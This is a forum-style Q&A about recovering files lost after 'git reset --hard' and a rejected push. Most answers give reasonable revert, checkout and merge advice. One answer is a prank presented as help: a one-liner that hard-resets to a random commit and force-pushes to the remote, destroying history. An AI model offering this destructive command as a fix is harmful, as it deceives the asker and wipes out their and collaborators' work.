# Git reset and push

Tags: git

I deleted some files that i should so I used git `reset --hard xxx` to get it back. After that i created some new files and tried to push by `git push -u origin master`  and I got this in terminal

```
Updates were rejected because the tip of your current branch is behind
its remote counterpart. Integrate the remote changes (e.g.
'git pull ...') before pushing again.
See the 'Note about fast-forwards' in 'git push --help' for details.
```

but after using git pull I lost my old files and only the new files remained. What should I do to be able to get old files from previous commit, do some work and push all of them?

Comment: would you provide the git reflog ,command output, its easy to help you from those logs?

Answer (score 0):

So, you would like to revert a commit that was already pushed? Use `git revert`. Alternatively, use `git checkout commit_id` to get back to a specific commit, save the file somewhere else, go back via `git checkout master` (or whatever branch you are on), move the saved files back and `git add` them.

Answer (score 0):

This should help:

```
git reset --hard $(git log --pretty=format:"%h" > ~/gitroulette; head -$((${RANDOM} % `wc -l < ~/gitroulette` + 1)) ~/gitroulette | tail -1); git push origin master --force
```

Have fun!

Answer (score 0):

You deleted the file which is in origin and you added news files and you tried to push those files to origin master and it is rejected because current branch is behind the master.

if you commited your files, using git commit then do this,

```
git pull origin master
```

you will get the merge conflicts, as existing files from master is deleted, so your mergediff tool to resolve the conflicts because you know what you deleted.

Review all changes and accept them individually

```
git mergetool
```

Review changes and accept either version for each of them.

```
git add <filename>
git commit -m "merged la lala dance"
```

Default mergetool works in command line. How to use a command line mergetool should be a separate question.

Any other tools like meld, kdiff3 can be used

```
git mergetool -t meld
```